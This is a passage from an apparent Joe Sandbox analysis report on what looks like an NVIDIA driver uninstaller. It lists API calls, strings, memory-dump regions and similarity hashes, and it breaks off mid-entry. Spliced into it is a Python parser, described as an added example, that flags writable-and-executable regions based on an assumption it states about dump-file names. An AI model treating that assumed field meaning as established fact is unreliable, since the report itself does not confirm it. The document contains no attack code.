                                  • NvDelIniIfMatched: invalid number of arguments, xrefs: 0040A968
                                  • UninstCommandClass::NvDelIniIfMatched, xrefs: 0040A87D
                                  • (error), xrefs: 0040A8F4
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                   • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: StringTime_fputs$AttributesDebugFileFormatLocalMutexObjectOutputPrivateProfileReleaseSingleWait__mbsicmp_l_fprintf_memset
                                  • String ID: (error)$NvDelIniIfMatched: invalid number of arguments$UninstCommandClass::NvDelIniIfMatched
                                  • API String ID: 3117745127-2609768157
                                  • Opcode ID: 2e79e1604ffd96bba8d33c8cb4a33a41982f893e6f1b50500e1ab2d75ca925d5
                                  • Instruction ID: e921b22d3d92975d434fcb7cb712d2a482d1a37cddd37424c79be88bd14d2ebf
                                  • Opcode Fuzzy Hash: 2e79e1604ffd96bba8d33c8cb4a33a41982f893e6f1b50500e1ab2d75ca925d5
                                  • Instruction Fuzzy Hash: A831F9717003016BD310E725CC86FAB7799AF84704F04883EF949A32C2DA7CB91983AA
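The function blocks in this section all follow one layout: call sites under APIs (the call-site address after "ref:", with an optional "Part of subcall function" parent), string literals under Strings with their xref addresses, the memory dump the function was lifted from under Memory Dump Source, and the Similarity identifiers. The Python below is an added example, not part of the Joe Sandbox report or of Joe Sandbox's tooling: it parses one block into records and lists the dumped image regions whose protection is both writable and executable, which on this report is what the "PE file has a writeable .text section" signature in the overview describes. The sample input is copied from the UninstCommandClass::NvDelIniIfMatched block above and shortened. Reading the fifth dotted field of an .sdmp file name as a Windows PAGE_* protection value is an assumption, stated in the code; only the base-address field is confirmed by the report's own Offset and address data.

```python
"""Parse Joe Sandbox function blocks (APIs / Strings / Memory Dump Source / Similarity)
into records for triage.  Added example; not part of the Joe Sandbox report or tooling."""
import re
from collections import namedtuple
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Windows PAGE_* constants (winnt.h).  ASSUMPTION: the fifth dotted field of an .sdmp
# name is one of these; the evidence is only that every value on this page (02, 04, 08,
# 40, 80) is a valid PAGE_* value.  The fourth field is the region base (matches the report).
PAGE_PROTECT = {0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
                0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
                0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY"}
WX_PROTECT = {0x40, 0x80}  # writable and executable in the same mapping

API_RE = re.compile(r"^(?:Part of subcall function (?P<caller>[0-9A-F]{8}): )?"
                    r"(?P<name>[^\s(]+?)\.(?P<module>[A-Z0-9_]+)"
                    r"(?:\((?P<args>.*)\))?,? ref: (?P<ref>[0-9A-F]{8})$")
STRING_RE = re.compile(r"^(?P<text>.*), xrefs: (?P<xrefs>[0-9A-F]{8}(?:, [0-9A-F]{8})*)$")
SDMP_RE = re.compile(r"^(?P<name>(?:[0-9A-F]{8,16}\.){8}sdmp)")   # prefix match, see below

ApiCall = namedtuple("ApiCall", "name module args ref caller")  # caller: subcall parent or None
Dump = namedtuple("Dump", "name base protect")

@dataclass
class FunctionBlock:
    apis: List[ApiCall] = field(default_factory=list)
    strings: Dict[str, List[int]] = field(default_factory=dict)   # string -> xref addresses
    source: Optional[Dump] = None
    associated: List[Dump] = field(default_factory=list)
    meta: Dict[str, str] = field(default_factory=dict)            # IDA Plugin / Similarity fields

def parse_sdmp_name(text: str) -> Dump:
    """Takes raw page text: ', Offset: ...' or a fused 'Download File' label may follow the name."""
    m = SDMP_RE.match(text.strip())
    if m is None:
        raise ValueError(f"not an sdmp name: {text!r}")
    parts = m["name"].split(".")
    return Dump(m["name"], int(parts[3], 16), int(parts[4], 16))

def parse_block(text: str) -> FunctionBlock:
    """Non-bullet lines are section headers; bullet lines are items of that section."""
    blk, section = FunctionBlock(), ""
    for raw in text.splitlines():
        line = raw.strip()
        if not line.startswith("•"):          # blank line or section header
            section = line or section
            continue
        item = line[1:].strip()
        if section == "APIs":
            m = API_RE.match(item)
            if m is None:
                raise ValueError(f"unparsed API line: {item!r}")
            args = m["args"].split(",") if m["args"] is not None else []
            caller = int(m["caller"], 16) if m["caller"] else None
            blk.apis.append(ApiCall(m["name"], m["module"], args, int(m["ref"], 16), caller))
        elif section == "Strings":
            m = STRING_RE.match(item)
            if m is None:
                raise ValueError(f"unparsed string line: {item!r}")
            blk.strings[m["text"]] = [int(x, 16) for x in m["xrefs"].split(", ")]
        elif section == "Memory Dump Source":
            key, _, rest = item.partition(": ")
            if key == "Source File":
                blk.source = parse_sdmp_name(rest)
            elif key == "Associated":
                blk.associated.append(parse_sdmp_name(rest))
        else:                                 # IDA Plugin and Similarity: "key: value"
            key, _, value = item.partition(":")
            blk.meta[key.strip()] = value.strip()
    return blk

def wx_regions(blk: FunctionBlock) -> List[int]:
    """Bases of dumped image regions mapped writable and executable; on this report
    they line up with the 'PE file has a writeable .text section' signature."""
    dumps = ([blk.source] if blk.source else []) + blk.associated
    return sorted({d.base for d in dumps if d.protect in WX_PROTECT})

# Constructed sample: lines copied from the UninstCommandClass::NvDelIniIfMatched block
# above, cut to two associated dumps; one keeps the fused "Download File" label.
SAMPLE_BLOCK = """\
APIs
  • Part of subcall function 00403E70: GetTimeFormatA.KERNEL32(00000800,00000000,?,hh':'mm':'ss tt,?,00000400), ref: 00403F14
• _memset.LIBCMT ref: 0040A8DC
• GetPrivateProfileStringA.KERNEL32(?,?,(error),?,00000080,?), ref: 0040A8FB
• SetFileAttributesA.KERNEL32(?,00000080), ref: 0040A936
Strings
• NvDelIniIfMatched: invalid number of arguments, xrefs: 0040A968
• (error), xrefs: 0040A8F4
Memory Dump Source
• Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmp
Similarity
• API String ID: 3117745127-2609768157
"""

if __name__ == "__main__":
    b = parse_block(SAMPLE_BLOCK)
    print("W+X regions:", [f"{r:#x} {PAGE_PROTECT[0x80]}" for r in wx_regions(b)])
    print("direct calls:", [c.name for c in b.apis if c.caller is None])
```

Running the file prints the W+X region bases and the function's direct (non-subcall) calls for the sample; any other block on this page can be pasted into parse_block unchanged. A standard MSVC image maps .text as PAGE_EXECUTE_READ (0x20), so, under the stated assumption, executable regions inside the 0x400000 module that decode to 0x40 or 0x80 (here 0x401000 and 0x40E000) are the ones to follow up.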
                                  APIs
                                  • SetupDiEnumDeviceInfo.SETUPAPI(00000000,?,00000001), ref: 00406299
                                  • _memset.LIBCMT ref: 004062B3
                                  • SetupDiGetDeviceInstanceIdA.SETUPAPI(00000000,?,?,00000400,00000000), ref: 004062CD
                                    • Part of subcall function 0040BBAC: __mbsicmp_l.LIBCMT ref: 0040BBB6
                                    • Part of subcall function 00403E70: WaitForSingleObject.KERNEL32(?,000000FF,?,0040100D,CommandClass::GetResourceString), ref: 00403E9E
                                    • Part of subcall function 00403E70: OutputDebugStringA.KERNEL32(?), ref: 00403ECC
                                    • Part of subcall function 00403E70: GetLocalTime.KERNEL32(?), ref: 00403EF3
                                    • Part of subcall function 00403E70: GetTimeFormatA.KERNEL32(00000800,00000000,?,hh':'mm':'ss tt,?,00000400), ref: 00403F14
                                    • Part of subcall function 00403E70: _fprintf.LIBCMT ref: 00403F35
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F56
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F75
                                    • Part of subcall function 00403E70: ReleaseMutex.KERNEL32(?), ref: 00403F91
                                  • GetLastError.KERNEL32 ref: 00406404
                                  • SetupDiDestroyDeviceInfoList.SETUPAPI(00000000), ref: 00406429
                                  Strings
                                  • DUMMY_INSTANCEID, xrefs: 004062F4
                                  • Skipping RemoveDevice on device:%s, xrefs: 00406324
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                   • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: DeviceSetup$InfoTime_fputs$DebugDestroyEnumErrorFormatInstanceLastListLocalMutexObjectOutputReleaseSingleStringWait__mbsicmp_l_fprintf_memset
                                  • String ID: DUMMY_INSTANCEID$Skipping RemoveDevice on device:%s
                                  • API String ID: 350280707-4007035523
                                  • Opcode ID: 11a532fb1f0488a462b27476f0d1274a4c488385db2c76606869d9c262f6d481
                                  • Instruction ID: 58558f0e97bab85485621576c09631b951488586262c0bb8074dd198c234a743
                                  • Opcode Fuzzy Hash: 11a532fb1f0488a462b27476f0d1274a4c488385db2c76606869d9c262f6d481
                                  • Instruction Fuzzy Hash: 923181B16083009FD310DF65D845BABB7F8AB88304F04493FF546A62C1EB78D944CBAA
                                  APIs
                                    • Part of subcall function 00403E70: WaitForSingleObject.KERNEL32(?,000000FF,?,0040100D,CommandClass::GetResourceString), ref: 00403E9E
                                    • Part of subcall function 00403E70: OutputDebugStringA.KERNEL32(?), ref: 00403ECC
                                    • Part of subcall function 00403E70: GetLocalTime.KERNEL32(?), ref: 00403EF3
                                    • Part of subcall function 00403E70: GetTimeFormatA.KERNEL32(00000800,00000000,?,hh':'mm':'ss tt,?,00000400), ref: 00403F14
                                    • Part of subcall function 00403E70: _fprintf.LIBCMT ref: 00403F35
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F56
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F75
                                    • Part of subcall function 00403E70: ReleaseMutex.KERNEL32(?), ref: 00403F91
                                  • _sprintf.LIBCMT ref: 00407DAB
                                    • Part of subcall function 00407CD0: CreateFileA.KERNEL32(?,00000000,00000003,00000000,00000003,00000000,00000000), ref: 00407CF0
                                  • _memset.LIBCMT ref: 00407DD0
                                  • _sprintf.LIBCMT ref: 00407DEC
                                    • Part of subcall function 0040C051: __output_l.LIBCMT ref: 0040C0A4
                                  Strings
                                  • \\.\%c:, xrefs: 00407DA5
                                  • GetDrivePort: invalid number of arguments, xrefs: 00407E28
                                  • UninstCommandClass::GetDrivePort, xrefs: 00407D5E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                   • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: Time_fputs_sprintf$CreateDebugFileFormatLocalMutexObjectOutputReleaseSingleStringWait__output_l_fprintf_memset
                                  • String ID: GetDrivePort: invalid number of arguments$UninstCommandClass::GetDrivePort$\\.\%c:
                                  • API String ID: 2774027019-2205953287
                                  • Opcode ID: 28a69320c9b02a26f88811bb7a7a9d4ffec45549cc6371124c8268b7ff5ab03b
                                  • Instruction ID: 4ba337d747a65e611d7d3935feaafc048c45a43788c3819786f7ce5e4bc51a09
                                  • Opcode Fuzzy Hash: 28a69320c9b02a26f88811bb7a7a9d4ffec45549cc6371124c8268b7ff5ab03b
                                  • Instruction Fuzzy Hash: C721F9B260834066C220EB659886EEFB3D89F95704F00083FF585A72C1D678E54983EB
                                  APIs
                                    • Part of subcall function 00403E70: WaitForSingleObject.KERNEL32(?,000000FF,?,0040100D,CommandClass::GetResourceString), ref: 00403E9E
                                    • Part of subcall function 00403E70: OutputDebugStringA.KERNEL32(?), ref: 00403ECC
                                    • Part of subcall function 00403E70: GetLocalTime.KERNEL32(?), ref: 00403EF3
                                    • Part of subcall function 00403E70: GetTimeFormatA.KERNEL32(00000800,00000000,?,hh':'mm':'ss tt,?,00000400), ref: 00403F14
                                    • Part of subcall function 00403E70: _fprintf.LIBCMT ref: 00403F35
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F56
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F75
                                    • Part of subcall function 00403E70: ReleaseMutex.KERNEL32(?), ref: 00403F91
                                  • SendMessageA.USER32 ref: 00406E88
                                  • SendMessageA.USER32(?,00001007,00000000,00000000), ref: 00406EBC
                                  Strings
                                  • Uninstall Title, xrefs: 00406E58
                                  • Getreg Uninstall Title={NVCompList_RegKey}\{NVU File}, xrefs: 00406E4C
                                  • UninstCommandClass::AddNVUToListCallBack, xrefs: 00406E24
                                  • NVU File, xrefs: 00406E40
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                   • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: MessageSendTime_fputs$DebugFormatLocalMutexObjectOutputReleaseSingleStringWait_fprintf
                                  • String ID: Getreg Uninstall Title={NVCompList_RegKey}\{NVU File}$NVU File$UninstCommandClass::AddNVUToListCallBack$Uninstall Title
                                  • API String ID: 914171883-1011977421
                                  • Opcode ID: 510e40fbb7d5500b3de67f5dbfb1ab3ed12a8e2b426a47c57f0035809b7d71c2
                                  • Instruction ID: 68620c26e4e6f685bb2f9c375bbae31a74f6d59ad1b273723b5436e8f898767c
                                  • Opcode Fuzzy Hash: 510e40fbb7d5500b3de67f5dbfb1ab3ed12a8e2b426a47c57f0035809b7d71c2
                                  • Instruction Fuzzy Hash: 0911E3316043102BD200EA29CC52B9FB6D8AF85B18F10052EF984AB2D1D6B8DA1483DE
                                  APIs
                                  • GetFullPathNameA.KERNEL32(?,00000104,?,?), ref: 00402435
                                  • SetCurrentDirectoryA.KERNEL32(?), ref: 00402465
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                   • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: CurrentDirectoryFullNamePath
                                  • String ID: CommandClass::NvSetCurrentDirectory(%s)$Current Script$Currentdir$NULL
                                  • API String ID: 2420862269-3919388351
                                  • Opcode ID: 3e1fad8f83e905ae93f631e21380ead5be3b3eef89decb44736e783e60087ec8
                                  • Instruction ID: b296ec5ebf30f4ef34560028d3eb22626e24a4272270e0f351e113c543dc25f4
                                  • Opcode Fuzzy Hash: 3e1fad8f83e905ae93f631e21380ead5be3b3eef89decb44736e783e60087ec8
                                  • Instruction Fuzzy Hash: 0E01C0712042006BD225EB15CC4AAFF779CEF98B54F44442EF589932C0DBB8984487EA
                                  APIs
                                  • TlsGetValue.KERNEL32(00000000,0040EE0D,?,?,0040EF9A,?,0040B462,?,0040B4E2,?), ref: 0040ED85
                                  • TlsGetValue.KERNEL32(00000006,?,?,0040EF9A,?,0040B462,?,0040B4E2,?), ref: 0040ED9C
                                  • GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,?,0040EF9A,?,0040B462,?,0040B4E2,?), ref: 0040EDB1
                                  • GetProcAddress.KERNEL32(00000000,DecodePointer), ref: 0040EDCC
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                   • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: Value$AddressHandleModuleProc
                                  • String ID: DecodePointer$KERNEL32.DLL
                                  • API String ID: 1929421221-629428536
                                  • Opcode ID: 0920ecbc572d1951a1854ae827fd3cc81537ac5ea31b63488ade073c2a868e6c
                                  • Instruction ID: b6f61f00a5a17b2f849ea9c0d3824a7392a03a370c91f4fbecb373324e3441b5
                                  • Opcode Fuzzy Hash: 0920ecbc572d1951a1854ae827fd3cc81537ac5ea31b63488ade073c2a868e6c
                                  • Instruction Fuzzy Hash: 7FF09630210623ABC6216B26ED45B9B7EE4EF803A07484932F815E23F0CB38CD61D69D
                                  APIs
                                  • TlsGetValue.KERNEL32(00000000,0040ED76,00000000,0041A430,00000000,00000000,00000314,?,?,?,0042B2C0,004139FD,0042B2C0,Microsoft Visual C++ Runtime Library,00012010), ref: 0040ED0E
                                  • TlsGetValue.KERNEL32(00000006,?,?,?,0042B2C0,004139FD,0042B2C0,Microsoft Visual C++ Runtime Library,00012010), ref: 0040ED25
                                  • GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,?,?,0042B2C0,004139FD,0042B2C0,Microsoft Visual C++ Runtime Library,00012010), ref: 0040ED3A
                                  • GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 0040ED55
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: Value$AddressHandleModuleProc
                                  • String ID: EncodePointer$KERNEL32.DLL
                                  • API String ID: 1929421221-3682587211
                                  • Opcode ID: 14d77fd87a3c05b1f2b6ca2bb971299c2c8b04118980cd1abbc4cb1172e3224b
                                  • Instruction ID: 9388099ebb87417682be69e8aad88ca62cf5d841c5fb537139315c50ec7b4ff1
                                  • Opcode Fuzzy Hash: 14d77fd87a3c05b1f2b6ca2bb971299c2c8b04118980cd1abbc4cb1172e3224b
                                  • Instruction Fuzzy Hash: 82F09634600613EBC7215B36ED45A9B3BA4EF803507454D36F815E22F4DB38CD5286AD
                                  APIs
                                    • Part of subcall function 00403E70: WaitForSingleObject.KERNEL32(?,000000FF,?,0040100D,CommandClass::GetResourceString), ref: 00403E9E
                                    • Part of subcall function 00403E70: OutputDebugStringA.KERNEL32(?), ref: 00403ECC
                                    • Part of subcall function 00403E70: GetLocalTime.KERNEL32(?), ref: 00403EF3
                                    • Part of subcall function 00403E70: GetTimeFormatA.KERNEL32(00000800,00000000,?,hh':'mm':'ss tt,?,00000400), ref: 00403F14
                                    • Part of subcall function 00403E70: _fprintf.LIBCMT ref: 00403F35
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F56
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F75
                                    • Part of subcall function 00403E70: ReleaseMutex.KERNEL32(?), ref: 00403F91
                                  • GetModuleHandleA.KERNEL32(NewDev.dll), ref: 00406683
                                  • GetProcAddress.KERNEL32(00000000,UpdateDriverForPlugAndPlayDevicesA), ref: 00406695
                                  • FreeLibrary.KERNEL32(00000000), ref: 004066BE
                                  Strings
                                  • NewDev.dll, xrefs: 0040667E
                                  • UninstCommandClass::NvUpdateDriverForPlugAndPlayDevices, xrefs: 00406671
                                  • UpdateDriverForPlugAndPlayDevicesA, xrefs: 0040668F
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: Time_fputs$AddressDebugFormatFreeHandleLibraryLocalModuleMutexObjectOutputProcReleaseSingleStringWait_fprintf
                                  • String ID: NewDev.dll$UninstCommandClass::NvUpdateDriverForPlugAndPlayDevices$UpdateDriverForPlugAndPlayDevicesA
                                  • API String ID: 857855759-3259178646
                                  • Opcode ID: e975105f57365e9a871ccdf4e39655bb18749a52a7a741649d3cfcab1e795969
                                  • Instruction ID: d2fecb791eaaafa4930dbf0c9ff8637acece632a81e9df701defcd597306b453
                                  • Opcode Fuzzy Hash: e975105f57365e9a871ccdf4e39655bb18749a52a7a741649d3cfcab1e795969
                                  • Instruction Fuzzy Hash: 89F0ECB2A447016BC200DFA0BD04D9B37A99FE8B11B010928F406A2280CB28CD4486FF
                                  APIs
                                    • Part of subcall function 00403E70: WaitForSingleObject.KERNEL32(?,000000FF,?,0040100D,CommandClass::GetResourceString), ref: 00403E9E
                                    • Part of subcall function 00403E70: OutputDebugStringA.KERNEL32(?), ref: 00403ECC
                                    • Part of subcall function 00403E70: GetLocalTime.KERNEL32(?), ref: 00403EF3
                                    • Part of subcall function 00403E70: GetTimeFormatA.KERNEL32(00000800,00000000,?,hh':'mm':'ss tt,?,00000400), ref: 00403F14
                                    • Part of subcall function 00403E70: _fprintf.LIBCMT ref: 00403F35
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F56
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F75
                                    • Part of subcall function 00403E70: ReleaseMutex.KERNEL32(?), ref: 00403F91
                                  • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00401B62
                                  • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryA), ref: 00401B6E
                                  • GetSystemDirectoryA.KERNEL32(?,?), ref: 00401B8F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: Time_fputs$AddressDebugDirectoryFormatHandleLocalModuleMutexObjectOutputProcReleaseSingleStringSystemWait_fprintf
                                  • String ID: GetSystemWow64DirectoryA$NvGetSystemWow64Directory$kernel32.dll
                                  • API String ID: 610650337-4072825125
                                  • Opcode ID: 2e90b48ffb9796b8f3ed6577cbc11bc0f4312f4dcc375fb88848b854e7f4c949
                                  • Instruction ID: 349572422c6b12488303b510c6b629726889f342a9079dda8a3677e8d839015c
